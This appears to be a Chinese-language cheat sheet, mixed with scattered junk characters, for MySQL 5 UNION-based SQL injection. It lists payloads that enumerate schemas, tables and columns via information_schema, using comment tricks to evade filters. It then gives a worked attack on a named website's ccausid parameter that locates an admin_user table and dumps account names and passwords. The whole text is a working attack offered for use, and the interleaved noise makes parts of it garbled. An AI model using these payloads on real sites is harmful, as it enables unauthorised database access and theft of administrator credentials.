查库
) }" C( ^$ m. u- [: ?
! \; F+ A) N# g8 n) m4 k6 e4 z- fid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
, i& _' W7 U# N6 @2 v9 i/ J) O8 B! v. Y# S7 ` a, m
查表
8 I2 K* e* n: ?# [' Q- ~" R E; p1 S9 u( C
) F/ Z2 j, U3 H3 A) ~id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1! U7 u: `7 j; s/ E
8 \; y2 K6 i; D! X7 N! C! m% w
查段/ _/ I4 z9 |$ a* E
& X' F+ r! ]' S* V( y! I8 G
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
- W6 G q1 k' T7 h' s& U/ @4 S: p9 H2 _! \, R4 F5 N4 J
a2 U' k: o0 _2 C$ l4 hmysql5高级注入方法暴表1 R" v) R* Q T9 d3 @( t" |+ H
' _9 K r" E+ R1 M& K" ~例子如下:
3 |- A/ e, r6 r. B, a! Q9 a( S- G3 K6 V! |0 \3 ~" J: r0 e! v; N6 U9 `
1.爆表# X) C- W; D4 N
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
3 K# |# l/ ?# Z5 U这样爆到第4个时出现了admin_user表。
0 c% ]2 t4 ^1 i. P7 x2 x W% w- X. h5 Z; n
2.暴字段" I2 V& D$ E) D# ]
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*5 h9 J) ]; f- K1 S* `( k1 k- U; O- r: @
! q. x9 x7 r& ]& S; o9 [) e
1 H1 E4 N# `+ \; D8 l5 Z- d3.爆密码2 C' X, w' E" K/ z6 a
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* * V4 K5 j* Q! g! g
* `* p* w( h9 r- V) F; A1 f; K
" j2 f; E, t F. \ S7 ]& m# E |